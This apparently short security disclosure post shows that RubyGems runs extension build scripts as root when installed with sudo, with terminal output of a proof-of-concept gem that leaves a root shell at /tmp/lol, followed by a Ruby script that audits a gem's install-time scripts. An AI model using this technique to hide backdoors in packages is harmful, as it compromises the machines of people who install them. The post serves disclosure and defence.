Another hilarious and trivial rubygems exploit. The file ext/<ext>/extconf.rb gets executed as root during installation. A malicious gem could put code in there that installs a backdoor.

Demonstration PoC: https://github.com/m4rkw/rubygems-poc2

    $ ls -la /tmp/lol
    ls: cannot access /tmp/lol: No such file or directory
    $ sudo gem install file-4.3.2.gem
    Building native extensions. This could take a while...
    Successfully installed file-4.3.2
    Parsing documentation for file-4.3.2
    Done installing documentation for file after 0 seconds
    1 gem installed
    $ /tmp/lol
    # id
    uid=0(root) gid=1000(mark) groups=0(root),1000(mark),1003(admin)
    #

Again, be *very* careful what gems you install!
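
One way to act on that advice is to read what a gem would run before installing it. The Ruby sketch below is an added example, not code from the original post or the PoC repository; the helper names `install_time_scripts` and `build_sample_gem` and the sample gem are constructed for illustration. It unpacks a `.gem` without executing anything and returns the source of every script listed in the gemspec's `extensions` field, which is what `gem install` runs while "Building native extensions".

```ruby
require "rubygems/package"
require "fileutils"
require "tmpdir"

# Return { "ext/<ext>/extconf.rb" => source } for every extension script
# that `gem install` would execute. The gem is only unpacked and read;
# none of its code is run.
def install_time_scripts(gem_path)
  pkg = Gem::Package.new(gem_path)
  Dir.mktmpdir("gem-audit") do |dir|
    pkg.extract_files(dir)                      # unpacks data.tar.gz only
    pkg.spec.extensions.map do |rel|
      [rel, File.read(File.join(dir, rel))]
    end.to_h
  end
end

# Constructed sample input: builds a harmless gem with one extension
# script inside `dir` and returns the path of the resulting .gem file.
def build_sample_gem(dir)
  Dir.chdir(dir) do
    FileUtils.mkdir_p("ext/demo")
    File.write("ext/demo/extconf.rb",
               "# constructed sample\nputs 'this line runs at install time'\n")
    spec = Gem::Specification.new do |s|
      s.name       = "demo-audit-sample"        # hypothetical gem name
      s.version    = "0.0.1"
      s.summary    = "constructed sample gem"
      s.authors    = ["example"]
      s.files      = ["ext/demo/extconf.rb"]
      s.extensions = ["ext/demo/extconf.rb"]    # scripts run at install time
    end
    File.join(dir, Gem::Package.build(spec, true)) # true = skip validation
  end
end

# Usage: ruby audit_gem.rb some.gem [other.gem ...]
if __FILE__ == $0
  ARGV.each do |path|
    install_time_scripts(path).each do |rel, src|
      puts "== #{path}: #{rel} (executed by `gem install`) =="
      puts src
    end
  end
end
```

A gem with an empty `extensions` list runs no build script at install time; for one that has entries, review the printed source first and avoid installing with `sudo`.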